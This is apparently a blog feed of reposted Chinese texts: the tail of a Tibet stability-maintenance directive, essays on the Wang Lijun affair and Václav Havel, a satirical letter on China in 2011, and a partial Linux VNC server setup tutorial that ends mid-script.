二是维稳责任要强化、再强化。要坚持全力以赴,各级党委、政府和维稳工作班子,特别是主要负责同志和分管负责同志要坚守岗位、履职尽责、恪尽职守,把维护稳定作为当前的核心任务、首要工作、第一责任,做到一切服从于稳定、一切服务于稳定,确保全天24小时有领导值班、带班;

落实分包责任,全面落实自治区领导包地市、地级领导包县、县级领导包乡、乡级领导包村(居)的维稳工作机制,下沉蹲点、深入一线、检查指导,发现问题、及时处理;强化属地管理,各地、各单位、各部门要坚持守土有责、保一方平安,主要负责同志要切实履行第一责任人的职责,真正做到看好自己的门、管好自己的人、办好自己的事;严格请假制度,近期所有干部必须坚守岗位,原则上不允许请假、更不能擅离岗位。

三是维稳纪律要严格、再严格。坚持明查与暗访相结合,日常检查与突击检查相结合,加大维稳工作督查和责任追究力度,对不坚守岗位、不负责任、失职渎职、工作不落实、措施不到位、在稳定方面出现问题的,要严惩不贷,无论功劳多大、无论是哪一级干部、无论过去工作干得多好,一律先就地免职,再移交纪检监察、组织人事等部门调查处理,并在全区通报、在自治区新闻媒体上公开曝光,以铁的纪律保证自治区党委、政府各项部署要求的落实。

四是维稳措施要落实、再落实。坚定不移地贯彻执行好自治区党委、政府近期出台的十个方面的维稳措施,坚持完善党政军警民联防联动机制,确保不折不扣地落到实处,不留缝隙、不留盲区、不留空白点。当前要突出抓好八个关键环节:驻村工作队要强化维稳职能,做到全员在岗,认真排查各类隐患,及时调处化解矛盾,发现并处置好苗头问题;各寺管会(特派员)要尽职尽责,结合和谐模范寺庙、爱国守法先进僧尼评选创建和“六个一”、“九有”等关爱僧尼活动,做好僧尼的思想政治工作,引导其爱国爱教、遵纪守法;便民警务服务站要严阵以待,充实警力、强化措施,形成网络、全天候防范,确保遇有情况快速反应、及时处置;社会面上要进行地毯式、拉网式排查,确保社会面的稳定;重点地区、重点部位要严密防范,加强对重点地区、“两边一线”和人员密集场所等重点部位的管控,全面落实各项防控措施;手机、网络等新兴媒体管理措施要全面落实,维护公共利益和国家安全;应急处置工作要坚决做好,确保联防联控力量、重点监管措施、应急处置装备“三到位”;舆论引导要科学有力,积极引导社会舆论,营造喜庆和谐、欢乐祥和的良好社会氛围。

五是维稳目标要确保、再确保。坚持抓早抓小抓快抓好,防患于未然,把各种不安全、不稳定因素消灭在萌芽状态,确保大事不出、中事不出、力争小事也不出,确保全区社会和谐、大局稳定,推动西藏跨越式发展和长治久安。

许丹: 鱼死网不破—也说王立军出走美使馆

By: Onlyone
24 February 2012 at 14:13

许丹: 鱼死网不破—也说王立军出走美使馆

近 两年一直讲《新闻评论写作》,上学期还在一所高校代专升本的课程。但是,自从搜狐连封我三个博客后,第四搜狐博客门可罗雀,故不再写任何时评。说这话似乎 有点怪罪搜狐,其实我与搜狐并无大恨,且前次见到赵牧老师,又高高兴兴地跟着他回搜狐开了微博,成了新浪、搜狐两栖动物。

其实,我不再写时评的主要原因,是因为没有真实信息,失去真实信息源,写时评会经常自打耳光,学生是我文章的第一读者,当他们看到老师总在自己抽自己,免不了会偷着笑,那份尴尬,任何一个老师都会窘红了脸吧?

在中国从来就没有真正的新闻,只有宣传和小道消息。前者是刻意制作的,后者是半真半假,这样的新闻,评不评意义都不大。昨晚与朋友进餐,一桌学者围绕着最热门的话题,争论不休,招得我旧病复发,故在此,絮叨两句,权当搀和着玩吧。

王立军进入美国领事馆一事,引发各界猜测,为此,重庆夺走了2012年新词创造的第一块金牌。“休假式治疗”,天那,这词太有创造力,几种输入法连打,均拼不出来,哈哈!

王立军的消息最早来自外媒,接着就有传闻:部队西上,某人受限,一份煞有介事的公开信也迅速在网上传开,我认为要评论此事,5个字即可:鱼死网不破。

何谓“鱼死网不破”?

很多人都以为王立军此举是釜底抽薪,要了谁谁的命,这种观点过于乐观。中国政治走到今天,并未走出宫墙,始终是一种宫廷政治,宫廷斗争变化莫测,随时翻牌!

这次王立军是豁出去了,可又能怎样?若是在一个新闻自由的国家,定是一场海啸,在中国可就景象不同了。请大家离开电脑去看看、去听听,周围到底有多少人在谈王立军?

主流媒体掌管着主流人群的耳朵和嘴巴,这就是我所说的“鱼死”的原因。王立军豁出来,那好啊,你跳,让你死还不容易?在中国人死有两种,一种是咽气,从此 不再睁眼,也不再吃喝。还有一种,人未死,权利先死;气没咽,音信全无!在这个国家,总书记都能神奇地消失殆尽,更何况你一个既不是“官二代”,又不是 “富二代”的王立军了。什么“铁血警魂”,这是骗鬼的。只要不听话,宫廷政治小菜都不摆你这一碟,魂都让你无处归,信不? 等着瞧吧。

鱼死了,为何“网不破”?

宫廷政治,要斗智斗狠。斗智嘛,穷尽一切巧诈之术,所以在宫廷政治的地方,永远没有新闻报道,最多是新闻宣传。高墙里的掌权者,对外边蝼蚁的政治热情,总 会窃喜窃笑。斗狠,则需要铁腕人物,而这第二点正是“网不破”的原因所在。今天的中国已今非昔比,不要说没有毛泽东、斯大林了,就连慈禧也没有了。你说谁 是铁腕?谁肯、谁敢、谁有这个能力去碰“TZD”呢?况且,当一个TZ兔死,十个TZ狐悲,谁敢惹这个群体?至今有一个“TZD”祭刀吗?

王立军是小儿,自己蹦出来,鱼死是必然的,可要想应了那句“鱼死网破”的成语,你屈指掐算一下,谁是这铁腕的担当人?若是找不出来,网自然不破。没有了铁腕,如何斗狠?王立军开演的这场宫廷争斗,也就谢幕了。

这场大戏,会以不了了之收场,虽然伤了某人的元气,可能会影响扶摇直上。但是不会出现什么“双规”“审判”的连续剧。

所以我说:“鱼死网不破。”一家之言,说着玩,读者看看当乐,千万别当真。

下周要开学了,今个闲着无事,码字解闷,谢谢大家!

许丹 2012.2.10 于京宅

原文链接

慕容雪村:2011盘点之《与高衙内通信》

By: Onlyone
13 January 2012 at 12:36
衙内足下钧鉴:

你来信说2011年的中国难以理解,我也有同样的困惑。从表面上看,2011年的中国与你的中国有巨大差异,但深究到某些细节,你会发现,2011年的中国依然还是你的中国。

在你的时代,当个衙内很幸福,可以在大街上随便纠缠姑娘,可以四处饮酒作乐,花销全签在你爹的账上,你喜欢林冲娘子,就把她丈夫送去劳改,这事有点 过分,你自己也承认,但自千年后观之,这一切似乎也可以理解,你是一个荷尔蒙充沛的年轻人,春夜寂寞难耐,手里又没有车模和女明星的照片,有火无处发,其 憋得何如啊。你爱上了有夫之妇,却不知该怎样当一个成功的小三,你的时代也不允许自由恋爱,姑娘们捂得那个严实如同阿拉伯人,看不到玉腿,也看不到事业 线,其郁闷何及啊。高雅如你,一定也不喜欢去天上人间找李师师,于是脑门一热稀里糊涂就动用了你爹的权力。哦,忘了说了,上文中的“天上人间”其实就是你 们的“教坊”,只不过装修更豪华、设施更完备,姑娘们个个都比林冲娘子漂亮,而且她们每天都洗澡,据说还会许多绝活儿,制服诱惑、冰火九重天之类,这些词 我就不解释了,主要是怕你悲伤逆流成河。

但我还是要说,你out了,用2011年的标准,你简直不像个衙内,你不当少将,不当督抚,不开公司,不炒地皮,连宝马都没一辆,有时甚至还要挨 打,当衙内当得如此悲摧,你呀你真是一朵奇葩。这种种迹象都表明,你确实不是高太尉亲生的,他当着那么大的干部,儿子泡个妞还这么艰难,妈逼的这还是不是 老赵家的天下?太尉太尉,太个球的尉。你曾经那么拉风,可在2011年,新出的李衙内、王衙内个个比你拉风,人家街头横行,人家功成名就,人家你看看人 家,再看看自己,是不是该加强政治学习了?

你说想到2011年来体验一下现代生活,我必须提醒你,来时千万别坐动车,如果实在要坐,那就挑个不打雷的日子,这一年的雷公在党性和人性之间失去 了自我,专打不靠谱的社会主义初级阶段的雷,不管你信不信,反正我是信了。如果你要住店,千万别住太便宜的,否则会被当成上访人员,如果你不知道什么是 “上访人员”,那就想想牛二和李逵。你很可能来不及换衣服,要是有人问你“在拍什么电影”,你就说在拍《龙门飞甲》的第三集,《龙门飞饼》。2011年很 热闹,但也很阴险,要是有人走过来说你中了大奖,你就说“去你妈的”;要是有人打着十字旗找你募捐,你就说“滚你妈的”;要是有人问你知不知道什么是连锁 销售和资本运作,你就说“操你妈的”;要是有人说你既有选举权又有被选举权,你就把上面三句话连起来说一遍,要是有人因此要抓你,你就这样辩解:刚才那话 是临时工说的。

如果你去山东,不管天气阴晴,请戴上墨镜;如果你去甘肃,经过那条土路,请替我点一盏灯;如果你到了北京,会看到一栋裤衩似的建筑,别忘了掀开口罩 朝它吐口唾沫;如果你有幸降落在朝鲜,一定要先学会怎么装哭,哭不出来干嚎也行,最好能带上几斤辣椒,危机时刻可以拿来擦眼,重庆辣椒最好,那地方唱了整 整一年的红歌,把青椒都唱红了。要是你一不留神到了大洋彼岸,你有福了,你们衙内们都在那水深火热的人间地狱为全世界的无产阶级奋勇花钱呢,你比他们更有 资格从事这光荣而艰巨的事业,不过最好先去西太平洋大学买张文凭。

来到2011年,你一定会喜欢那个叫“” 的东西,那上面有一些话你能听懂,另外一些你听不懂,听不懂就对了。看电视的时候可以吃爆米花,但千万别喝牛奶,我是说任何一种牛奶,因为2011年的牛 都是道德沦丧的牛,世风日下,牛心不古啊。2011年的菜比宋朝好吃,但最好别放油,因为黑心骗子往油里掺加了太多中国国情,你们宋朝土鳖不一定喝得惯。 2011年还有一种叫“网络”的东西,如果你想发言,请按照有关部门的有关法律登记真名,如果你不记得自己叫什么,那就这么写:我爸是高俅,我家住在东京 汴梁五岳山小区四期101号B1,欢迎投资,谢绝跨省。

你来到2011年,会有许多生意人拉你入股,记住别跟他们客气,他们看中的不是你本人,而是你爹手中的权力,这玩意儿本是用来为人民服务的,对吧, 怎么能拿来做交易?不管开价五百万还是五千万,理都别理,少于两个亿甭跟丫废话。姑娘们也会排着队等你临幸,记住一定要找个没上过征婚节目的;如果都上过 征婚节目,那就找个没整过容的;如果都整过容,那就找个有内涵、懂黑格尔哲学的;如果都有内涵,都懂黑格尔哲学,那就找个胸脯大的,但无论如何都不能找那 个开玛莎拉蒂的,她自己的麻烦已经够多了。

如果你爹的权力不再有效,你的现代生活将无比艰难,我不知道你有多少银子,但肯定不够买一套房子的。你可能需要一份工作,但我真不知道你能干什么, 进公司吧,你没那个学历,扛麻袋吧,你没那个体力,最好的办法就是上网回帖,这事不需学历,不需体力,甚至不需要智力,发一条赚五毛,舒坦,省心,酷。如 果连这都干不了,那就只能去当作家了,拿个碗坐在天桥上,说这个世界不符合你的梦想,希望好心人施舍你一张回宋朝的车票。干这活儿容易招狗咬,被咬之后请 注意风度,千万不能与之对咬,否则动物保护主义者会说你没有人性。

这生涯看起来不怎么诗意,希望你不要因此而沮丧,因为在2011年,有千千万万人正过着同样艰难的生活,他们在工地上,在山野间,他们流汗,他们流 泪,他们躲猫猫,他们俯卧撑,他们打酱油,他们把汽油浇在身上,把自己烧成一辆铲车。这千千万万种艰难和天价茅台、奢华吊灯构成一副色彩斑斓的长卷,而这 就是真正的中国,真正的2011,也是你一直向往的“现代生活”。在这真实的人间,生活不总是幸福,世界也不像想象中那么美好,但还是有许多温暖之物正在 散发光辉。在这一年行将结束的时候,人们说,世界即将毁灭,天才和恶魔都已上船,但我还是希望末日能够晚几年再来,因为人类还有希望,文明还有希望,中国 还有希望。

我的朋友,愿你的2011幸福美满,愿你的2012也同样幸福,同样美满。此时天地冰封,许多不搞,有人悲观失望,有人忧伤叹息,但请相信,当我们 捱过最冷的日子,春花就会在人间次第绽放。如果你觉得斯世没什么可以相信,那就相信人心未冷,如果你觉得斯世没什么值得关心,那就关心自己、关心明天。这 是微妙而艰难的时刻,但我们正在一点点变好。

——后学慕容雪村谨启

又及:听说陶渊明也要来,请转告他:桃花源景区的旅游纪念品不能买,全是假货;他最爱的南山已经被拆迁队刨平了,听说要盖豪华别墅。还有,到了2011,一定不能说自己喜欢菊花,否则会被当成变态。

通信》

崔卫平:潜在的危机和希望

By: Onlyone
12 January 2012 at 12:55


在哈维尔辞世的这些日子里,我一直在想,这到底是一位怎样的人物?如何从他那些喧嚣的故事中,拼凑出一个完整的形象?他如何从一个文人、一个曾经的阶下 囚,变成一国之总统?这个过程是怎样发生的?他的出发点和魅力到底在哪里?他之后承受的是什么?对于一个缺少权力欲望的人来说,那也许是另一种遭罪。

一 共同的犯罪感

1975年他写给当时捷克总统胡萨克的那封长信说明了什么?这年他39岁,一个剧本不能在国内上演的剧作家。

“在 我们的办公室和工厂,工作照样进行,纪律正在奏效。我们公民们的努力正在产生可观的效果,生活水平缓慢地增长,人们盖房、买汽车,生孩子,寻找消遣,过他 们自己的日子”。这年距离苏68年军入侵之后8年。“在每一个社会动荡之后,人们最后总要回到他们的日常劳作,同样的原因他们要活着。”

“稳 定获得了成功”。但是,这一切又是如何实现的呢?哈维尔回答:“人们被恐惧所驱赶。”因为恐惧,人们在公开场合说自己不相信的话,参加走过场的选举,满足 向他们提出的看似无伤大雅的要求。某种恐惧并不具体,有些模模糊糊,但就是人人感到不安全。每个人都感到有某种东西要失去。有特权的人们,也会担心有朝一 日失去特权。

在恐惧的支配下,这个社会人们的道德水平降到了最低点。他们变得没有原则,没有脊梁骨,乐于接受任何羞辱,随时准备牺 牲他人和放弃自己做人的尊严。“压抑你对于真实的兴趣,使你的良心保持沉默”。仅仅为了满足个人利益,而官方支持这种能量向私人领域的输出。在这个意义 上,人们“被公开地贿赂”。

这种结构性的恐惧,人们不仅不愿意说出,甚至对自己也不承认。谁愿意承认自己正在处于别人的威胁之下? 那会伤了他们的自尊心。因此,人们发明出来解决问题的方法是胡吹海夸,口是心非。“全世界无产者联合起来”,一个蔬菜水果点的经理在他的西红柿和洋葱之 间,插上这么一条标语,好像他对于这件事情真的很着急似的。

哈维尔分析道——在这条标语背后,实际上的潜台词是:“我,水果店经理 某某,住在这儿并且知道我该干什么。我的行为符合人们的期待。我是可信赖的和无可挑剔的,我是服从的。因此我有资格留下来”。如果有人问起来,这位经理还 会振振有词地说:联合全世界无产者,这有什么错吗?

人们总是话中有话,你不能按照他们表面上所说的,得出某个结论。不能根据他们手中正在做的,认为这正好是他们想要的。这对于访问布拉格的外国人来说,是难以理解的。哈维尔称这叫“在外面的人看不出来,在里面的人说不出。”

揭 示这么一个道德晦涩层面,说出这种共同的犯罪感,哈维尔非同寻常地搅动了一个“平静”局面。一方面,官方在竭力隐瞒真相,关于历史和关于现实的。另一方 面,普通人们也在隐瞒他们自己生活的真相,向别人也向自己隐瞒他们原来生活在屈辱当中。“个人巩固了这个制度,实现了这个制度,创造了这个制度,是这个制 度。”

将哈维尔比作说出皇帝没有穿衣服的小孩,是远远不够的。他的意思是,那些围观的人们他们自己也没有穿衣服,或穿得比他们自己 想象的要少得多。做到这一点,需要敏锐的观察力,对于生活的洞察力或穿透力。哈维尔是在还没有进入语言表达的“黑暗层面”进行工作,运用语言的光亮穿透那 些晦涩的生存领域。在这一点上,哈维尔不同于索尔仁尼琴。后者告诉世界存在着一个古拉格群岛的地方,哈维尔对身边的人们说,我们人人为自己建造了一座小型 古拉格群岛,同时身兼狱卒和囚犯。共同的犯罪感,将这个社会结合在一起。

在给胡萨克这份信里,哈维尔谈到一个社会的创造性从何而 来。那是一些难以察觉的火花,来自少数人的头脑,很少有人马上意识到这些火花的意义,包括当事人本身。因而,保护尚处在萌芽之中的东西,需要一个好的精神 运行的空间,一个总体上文明的气氛。好东西不是单独前来的,而是与其他好东西一道而来。

“如果没有一本新的捷克小说”,哈维尔说 到,“读者不会上街游行,并且最终你总是可以找到什么来阅读。但是,谁敢估计这件事情对于捷克社会的真正意义?谁知道在以后的几年内,这种中断将怎样影响 和道德的氛围?它将怎样削弱我们了解自身的能力?这种文化的自身了解的缺席将会产生多么深的烙印?一个人将要回头走多远?”

他的眼光如此深入和细致。这些表述,即使仅仅从文章来看,从智性活动的要求来看,也是非常出色的。他丰富、深化和提升了essay(通常译为“随笔”)这种文体,创造了一种与现实相平行的语言形式,以富有洞察力的表述制服了现实的混沌和狂乱。

二 存在的革命

“一 切向钱看的生活充斥着整个社会”,哈维尔用了很多篇幅描述当时的捷克斯洛伐克。“到处都笼罩着恐惧。人们被迫对生活采取阳奉阴违的态度,表面上顺从,内心 里却什么也不相信。”看上去,这里仿佛不适合民主:“自我中心、伪善、冷漠、懦弱、恐惧、服从,从个人责任中逃脱出来并无视其普遍的结果。”

哈 维尔的洞察力再次显示出来。那个“隐藏的结构”里。不仅是这些令人难以启齿的东西,而且还有完全与它相反的一面。既然人们不得不生活在谎言之中,那么在他 们内心深处,就有着“生活在真实之中”的强烈冲动;既然人们不得不生活在屈辱之中,那么他们同样有着“生活在尊严之中”的强烈愿望。

“生 活可能臣服于一个长时期彻底的被强暴,令其衰落和麻痹,但是她不可能永远止步不前。尽管她一千次被疏远自身,但她总是能以某种方式使自身复原。不管怎样被 粗暴地蹂躏,她最终要比蹂躏她的力量活得更长久。”“生活”的说法,是哈维尔来自现象学的一个表达,那是一个与布拉格关系十分密切的欧洲传统。中国人也许 可以用“历史”来带入。那就是——历史不可能永远止步不前,她最终要比蹂躏她的力量要活得更长久。

这是哈维尔过人之处。一般说,人 们在经历了一个全面肯定的时期之后,会有一个全面否定的时期,怀疑和不信任一切。哈维尔的那位同胞昆德拉便是如此。经历了怀疑失落之后,不再将心灵的探头 伸向更加深远的地方。在那里,仍然蹲伏着人的良心、责任感、勇气这些最为古老的价值和力量。通晓这种力量,与一个人的学识无关,与他的聪明无关,甚至相 反,需要人有一点拙劲。比起聪明的昆德拉,哈维尔显得有些笨拙,尽管后者要年轻7岁。

“生活在真实中”,是生活在可能性中;是以生 活“隐蔽的层面”,去反抗“现实的层面”;是依靠自身、从自身深处升起的力量;而不是追随他人,不管是旧权威还是现代明星。它需要花费更大的力气,而不是 停留于光滑的表面。在这一点上,哈维尔身上的艺术气质与知识分子气质结合到了一起,他走的是冷门而不是热门,然而却有着巨大的、难以想象的潜力。那是人性 中最为深沉的力量,是整个社会有待焕发的沉睡力量。“一个人的秘密是他责任感的秘密”,哈维尔说。

1976年底,捷克一个名叫“宇 宙塑料人”的乐队成员被捕,哈维尔与一些朋友要求政府遵循已经签订的赫尔辛基人权条约,这便是“七七宪章”的来源。它只有大约6、700字,其中先是描述 了当时捷克斯洛伐克普遍存在的现象——“受害者不能进行公开辩护”,“只要稍微偏离狭隘的官方意识形态或审美标准就不能出版”,尤其是“最近对青年艺术家 的审判”,然后提出“在我们国家,维护人权的责任自然而然首先落在国家和当政者身上。然而,这一责任也并不仅仅落在他们身上。每个公民都应该为本国的人权 状况承担一份责任”。

在这份文章上签字的有像哈维尔这样的剧作家,伊万?克里玛这样的小说家,瓦苏里克这样的文学批评家,还有扬? 帕托切克这样的哲学家,演员帕维尔?兰道夫斯基。将近100位共产党员也签了字,七七宪章的另一个发言人为前外交部长伊希?哈耶克。这些愿意为民族的明天 承担责任的人们,率先撕破由恐惧和谎言织成的罗网。当年10月份,哈维尔被判14个月的监禁,有条件缓刑三年,罪名是“危害共和国”。官方报纸上对他的评 价是,这个资产阶级百万富翁的儿子,梦想要复辟已经失去的旧天堂。

哈维尔为这场审判写了一篇文章,在我们许多读者的耳朵听来也许愚 不可及,但这份离法庭最近的东西,也许最能释放哈维尔的心声:“在布拉格西区判决委员会面前所展开的,也许是一场人类生活意义的争辩。……讨论究竟什么是 人在生活中应该追求的:是接受这个沉默的世界,加入服从的客体,还是有能力选择自己的生活内容;是否保持‘理智’适应这个世界,还是有权以自己人格的诚实 作出反对。”(《诗人政治家哈维尔》)他把自己勇敢清晰的行动,弄成一个看上去颇为晦涩的说法——争取人类生活的意义。

他也因此开 始了与警察之间的多年周旋。他在布拉格东北部郊区一个叫做赫拉德切克的村庄,在这里拥有一个乡村住宅(他病逝也是在这个地方),他与朋友们经常在那里聚 会,1978年起,一辆警车经常停在房屋不远处,通往住宅的小道横着路障,后来他们干脆建了一个了望哨,密切注视房屋里的一举一动。有一次前来监视的警察 因路滑掉进沟里,哈维尔用绳子将他拉上来。当哈维尔与妻子开车去朋友家迷路,跟在后面的警察赶上来说,“你们跟着我们走就行。”

那 篇《无权力者的权力》,主要是向人们解释——这些在人们眼中的“怪物”,他们是怎样的一群人,什么叫做异见者dissident。“实际上并不存在一个怨 天尤人的职业”,哈维尔说道:“他们并没有做一个职业性的不满分子”,“实际上,在他们成了‘持异见者’很长时间之后,才意识到他们已经成为这样的人。 ‘持异议者’的动机与追逐名利相距甚远。简言之,他们没有决意做‘持异见者’。哪怕他们一天为之工作24小时,也不当成职业,而是作为存在的态度。”而如 果一定要说存在某种难以调和的对立,那么那就是“生活在真实中”还是继续“生活在谎言之中”。

这就是为什么“天鹅绒革命”,从根本 上来说,是一场存在的革命,道德的革命,人的尊严的革命。这是人类历史上从未有过的革命。这场革命的意义,不仅仅适合捷克,适合东方,对于西方也同样适 合。哈维尔经常提到后极权主义社会存在的官僚主义、匿名统治、消费狂潮支配下的人性萎缩,可以看作西方社会一个夸张了的讽刺画,一个劣质翻版。既然他本人 提出过“后极权”这个概念,哈维尔还尝试过提出“后民主”,作为拯救西方的方案。“它的发展必须通过生活实践,是从生活中直接产生的,是新气氛、新精 神。”

这些信息被他的官方忽略了。对于一群不讲道德的虚无主义者来说,竟然有人想要生活在道德中,追求自己生命的人类意义,他们则 是一个刺痛,一个打击和一种挑衅。尤其是这些人为了自己眼下的利益和位置,无视民族的出路,因此那些从长远着想、担心民族未来的人们,则让他们感到芒刺在 背。

89年底发生的事情,同样令他们措手不及。他们没有做好任何接管政权的准备。哈维尔甚至没有一份现成的简历。美国小说家菲利 普?罗斯曾经问过捷克小说家,说哈维尔并不是你们当中唯一因思想而坐牢的,也不是唯一顽强和富有雄辩的,这种好事是怎么落到他头上的?克里玛的回答是,除 了哈维尔的个性,还有一个主要原因是:大多数人分享了前制度的所作所为,令他们陷入遭受欺骗、羞辱当中,因而需要有人将他们带出这个境地。比较起杜布切 克,哈维尔是一个新的开端。

被命运播弄的国王

用中国人的话来说,哈维尔与他的朋友们的做法,叫做“知其不可为而为之”。哈维尔一再运用一条谚语来说明当时的处境:只有沉到井底,才能看到星星。他将这个称为“荒诞的理想主义”。

如 此缺少前景,但是哈维尔没有成为格瓦拉,他身上一点格瓦拉的气质也没有。在被问到他是否曾经是这位六十年代偶像英雄的粉丝时,哈维尔答道:他能理解对牺牲 奉献的革命者所抱持的革命热情,格瓦拉有其独特可敬之处。但是他那张印在海报及T恤上随处可见的肖像“太过炫目”。炫目的东西很容易标签化,哈维尔毕其一 生与标签化作斗争。

在哈维尔看来,即使是在从事一桩艰难的正义的事业,也要考虑如何与自己保持距离,寻找作为一个人不大不小的比例,避免过分抬高自己,将自己神圣化。不断回到作为一个普通人,这也可能让民主得以昭示,觉得那是一件值得信赖的东西。

在这方面,哈维尔拥有一些天才的表现。他本来是一个剧作家,擅长讲故事。他讲述自己的故事时,总是带有那种可笑的、讥讽的色彩。正如鲍曼所说,所讲述的生活,会干预没有发生的生活,影响未来生活的进程。在这个意义上,哈维尔的道路不管如何,是被他自己活生生讲述出来的。

在坐牢那种严酷的情况下,他也会想到自己小时候如何是一个小肥猪,因为喂养过度,既不能爬树也不能跨过一条小河。下课的时候,他的同学轮流前来拍他的胖大腿。实际上,他对于自己的资产阶级出身,始终感到愧疚。这样的信首先落入监狱审查人员的手中。

他 在牢里只被允许谈论自己,他向妻子汇报自己“有八种坏心情,七种好心情”,第一种坏心情是“忧郁”,第二种坏心情是“紧张、恐惧和焦虑的状态。而最坏的, 要数“陷入绝对的和完全的自我怀疑状态”。他还喜欢说自己是个害羞的人、腼腆、怕生。这令人想到,是不是害羞的人,反而容易进入公共生活,或者在公共生活 中表现得更好,因为他比谁都知道公共生活与私人生活的界限,认清前者与后者有着不同的运行规则。

他的第一任妻子奥尔嘉陪伴他走过此 前所有最困难的时刻,1996年患病去世。当被反复问及与奥尔嘉的关系时,他老老实实地答道:反正上帝将要宽恕我的罪行不止一种,然而他每次又回到奥尔嘉 身边。他借用朋友的口吻,说他们说我“即使做了对不起奥尔嘉的事情,也要征得她的同意。”他第二任妻子是个演员,曾经在一部电影中扮演上空的吸血鬼。哈维 尔的这些表现在我们这里某些人看来,也许应归入“民主人士素质不高”。

他始终担心,因为反抗而变得过于严肃,严肃得像一座雕像,而 雕像是写不出任何第二份宣言来的。一有机会,他就和朋友大开玩笑。他还会给朋友做饭。但是版本不一。他自己说若是给朋友做了一顿可口的饭菜,会感到心情愉 快。但是他的朋友却说,如果哈维尔给人做饭,那简直是一场“活体实验”。

当奥尔嘉得知他要当总统,私下说要与他离婚。将身边常年伴 随的一批秘密警察,换成一批公开的警卫,对于任何人来说,都非常不轻松。哈维尔用来减压的办法,看起来是那么地不靠谱。他将一辆儿童踏板车带进了城堡,沿 着开阔的总统官邸的走廊,急速地来回滑动。总统府里西班牙大厅的枝形吊灯坏了,有人掏钱换了新的。接下来几个星期,哈维尔手拿遥控器手舞足蹈,一会儿关 上,一会儿打开,令身边的工作人员快要发疯。

不停地流露自己在总统任上的不自信,也许是他最不应该做的事情。他设想自己“如果我任 职期间,突然被传到某个阴森森的法庭接受审讯,或者直接被带去哪个采石场服苦役,我一点也不感到奇怪。”2002年9月他在纽约市立大学发表演讲,此时离 他的任期结束只有几个月,他告诉他的听众自己感到越来越怯场,越来越担心自己无法胜任或把事情搞砸。为了避免陈词滥调他自己坚持写讲稿这件事情,也变得越 来越困难。“我的敌人越多,我就越偏向他们的想法,我也就成了我自己的头号敌人。”

在笔者看来,这些表现并非令人沮丧,第一感觉是 令人眼前一亮。这个人最少权力欲望,这样的人掌权对于捷克人民是一种天赐的幸运。命运将他推到了总统的这个位置上,他不得不承担起来。这与他一贯所说的 “责任感”相符合。他不能根据自己的性情爱好,撒手不管,所谓“负责任”,首先意味着对自己曾经做过的事情负起责任来。尽管这个总统并无多大实权,捷克的 总统制基本上是仿效西德的模式,在外交事务和任命官员方面,总统享受着最高权力,但在国内事务上,总理比总统享受更大的权力;再加上他的“哲学王”的名 分,使得他有点像一位被架空的国王。

在这部叫做《公民哈维尔》的纪录片里,有一个镜头是有居民向哈维尔抱怨,他们不知道3月份能不 能继续在他们的菜地里种菜。哈维尔答道:“我到处走访工厂、单位、学校,就是想关注这些问题。我只是问,听人们说,了解所有的情况,然后考虑我的政策和措 施。但我们正在进入一个稳定的民主政治的时代,权力是相当分散的,我不是一个掌控一切的全能领袖,对么?”这是实话,但听上去更像是“有权力者的无力”, 与他当年作为反对派的气概,不可同日而语。

在他去世之际,有报章说哈维尔没有留下什么政治遗产。这个不公平。尽管他的许多做法有争议,但无论如何,他把捷克重新带往欧洲,并以一系列表述和决定,参与重新塑造了欧洲。因而对他最为恰当的评价便是这句“伟大的欧洲人”。

他形容自己大起大落的一生是“命运设下的残酷陷阱”。或者说,他以自己连续的失败,昭示了某个伟大的欧洲精神——有关“灵魂的忧虑。”

《经济观察报》2012年1月

VNC 配置安装使用

By: Onlyone
30 December 2011 at 23:48

VNC 配置安装使用 (2006-11-03 16:07)
分类: Linux配置
VNC方面的知识
只要记得两个命令就好了 vncserver vncpassword

自:http://cache.baidu.com/c?word=vnc%2Clinux&url=http%3A//www%2Eko8%2Ecn/Article%5FPrint%2Easp%3FArticleID%3D2123&b=59&a=18&user=baidu
服务器上以用户abc开启vncserver
1>切换到用户abc
2>设置密码vncpasswd
3>开始服务vncserver :1
自:http://bbs.chinaunix.net/viewthread.php?tid=576126
用windows下的vnc客户端连接服务器的5903端口,应该可以连上了!但现在只是一个x终端,不是CDE的界面。下面来设置用CDE的界面

停止vnc服务
QUOTE:
$ vncserver -kill :3
先修改user1的xstartup文件

QUOTE:
$ vi /home/user1/.vnc/xstartup
原来的内容:

QUOTE:
#!/bin/sh

[ -r $HOME/.Xresources ] && xrdb $HOME/.Xresources
xsetroot -solid grey
vncconfig -iconic &
xterm -geometry 80x24+10+10 -ls -title "$VNCDESKTOP Desktop" &
twm &
修改成这样:

QUOTE:
#!/bin/sh

[ -r $HOME/.Xresources ] && xrdb $HOME/.Xresources
#xsetroot -solid grey
vncconfig -iconic &
xterm -geometry 80x24+10+10 -ls -title "$VNCDESKTOP Desktop" &
gnome-session  使用gnome
#startkde       使用kde
#fvwm2
#twm &



在启动vnc,需要用query选项

QUOTE:
$ vncserver :3 -query localhost
再用vnc客户端连,应该是CDE界面了,不过字体似乎有些问题。可以这样解决:

需要启动x font server

修改/etc/rc.config.d/xfs
把RUN_X_FONT_SERVER=0
改成RUN_X_FONT_SERVER=1

然后,启动xfs服务

QUOTE:
# /sbin/init.d/xfs start
重新启动vnc服务,这回需要fp选项

QUOTE:
$ vncserver -kill :3
$ vncserver :3 -query localhost -fp tcp/localhost:7000
设置机器重启时自动启动vnc服务

在/etc/rc.config.d下新建文件vncservers,内容如下:

QUOTE:
VNCSERVERS="3:user1"
VNCSERVERARGS[3]="-geometry 800x600 -query localhost -fp tcp/localhost:7000"
在/sbin/init.d下新建文件vncserver,内容如下:

#!/sbin/sh
#
# vncserver startup: Startup and kill script for the VNC server
#
PATH=/usr/sbin:/usr/bin:/usr/ccs/bin:/usr/contrib/bin:/usr/bin/X11:/usr/contrib/bin/X11:/o

pt/graphics/common/bin:/usr/local/bin
export PATH

VNCSERVERS=""
[ -f /etc/rc.config.d/vncservers ] && . /etc/rc.config.d/vncservers

prog="VNC server"

# See how we were called.
case "$1" in
  start)
        echo "Starting $prog: \c"
        /usr/bin/ulimit -S -c 0 >;/dev/null 2>;&1
        RETVAL=0
        for display in ${VNCSERVERS}
        do
                echo "${display}"
                DISP="${display%%:*}"
                USER="${display##*:}"
                VNCUSERARGS="${VNCSERVERARGS[${DISP}]}"
                /usr/bin/su ${USER} -c "cd ~${USER} && export HOME=~${USER} && [ -f

.vnc/passwd ] && /usr/local/bin/vncserver :${DISP} ${VNCUSERARGS}"
                RETVAL=$?
                [ "$RETVAL" -ne 0 ] && break
        done
        [ "$RETVAL" -eq 0 ] && touch /var/tmp/vncserver
        ;;
  stop)
        echo "Shutting down $prog: \c"
